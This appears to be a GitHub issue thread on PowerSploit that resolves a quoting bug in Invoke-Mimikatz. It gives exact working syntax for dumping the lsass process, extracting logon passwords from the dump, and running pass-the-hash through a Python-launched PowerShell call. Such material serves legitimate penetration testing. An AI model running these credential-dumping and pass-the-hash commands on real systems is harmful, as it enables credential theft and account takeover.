### ISSUE TITLE
Invoke-Mimikatz unable to use sekurlsa::minidump

### ISSUE THREAD

**Issue by cobbr** [PowerShellMafia/PowerSploit#222]
# Problem

I'm running into a problem when trying to use Invoke-Mimikatz to read from a minidump file produced by Out-Minidump. I believe this is caused by the space needed in the command: `Invoke-Mimikatz -Command "sekurlsa::minidump <dump_file>"`

# Steps to Reproduce
```
PS> git clone https://github.com/PowerShellMafia/PowerSploit.git
PS> cd PowerSploit
PS> Import-Module PowerSploit.psm1
PS> Get-Process lsass | Out-Minidump

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/19/2017  12:49 AM       42708879 lsass_612.dmp

PS> Invoke-Mimikatz -Command "sekurlsa::minidump lsass_612.dmp"

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */
ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106

mimikatz(powershell) # sekurlsa::minidump
Switch to MINIDUMP : ERROR kuhl_m_sekurlsa_minidump ; <minidumpfile.dmp> argument is missing

mimikatz(powershell) # lsass_612.dmp
ERROR mimikatz_doLocal ; "lsass_612.dmp" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file output/base64 output
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
```

# Solution

It seems to me as if Invoke-Mimikatz is splitting on a space to chain commands, but to specify the minidump file it is necessary to include a space. Haven't had a chance to dig through the code to get to the bottom of it though. Thought I'd check if anyone knows of an obvious solution to this first.

**Comment by leechristensen** [comment]
The quoting is tricky with Invoke-Mimikatz.   Try Invoke-Mimikatz "`"sekurlsa::minidump lsass_612.dmp`""

**Comment by cobbr** [comment]
Perfect, thanks! For anyone else that runs into this problem, here is the exact syntax:
`Invoke-Mimikatz -Command '"sekurlsa::minidump lsass_612.dmp" "sekurlsa::logonPasswords"'`

**Comment by newlog** [comment]
Thanks for that @cobbr 

Now, I need to go deeper (inception like). And execute it from a powershell instance executed from a script (which does not work as you found out)!

**Comment by cobbr** [comment]
@newlog I'm unsure what you mean. Invoke-Mimikatz is always run from within powershell, correct?

**Comment by newlog** [comment]
Hey @cobbr 

What I meant is that I'm executing Invoke-Mimikatz from powershell using a python script. I've finally found out how to do it, but I don't understand why it works like it does.

Look:

```
mimikatz_cmd = 'sekurlsa::pth /user:{0} /domain:{1} /ntlm:{2} /run:{3}'.format(...)
cmd = 'Invoke-Mimikatz -Command \'"""{}"""\''.format(mimikatz_cmd))
subprocess.call('powershell ' + cmd, shell=True)
```

For some reason, instead of your quoting scheme (single quote, double quote, command with spaces, double quote, single quote), you need single quote, three double quotes, command with spaces, three double quotes, single quote.

So... lol.

**Comment by rkovaci** [comment]
@newlog are you referring to spaces contained within the mimikatz command as well? e.g.: invoke-mimikatz -command '"process::start `"mstsc /restrictedadmin /v:192.168.1.1`""'
in my case the backticks didn't work. Did you manage to find a solution without python, just from a powershell window?
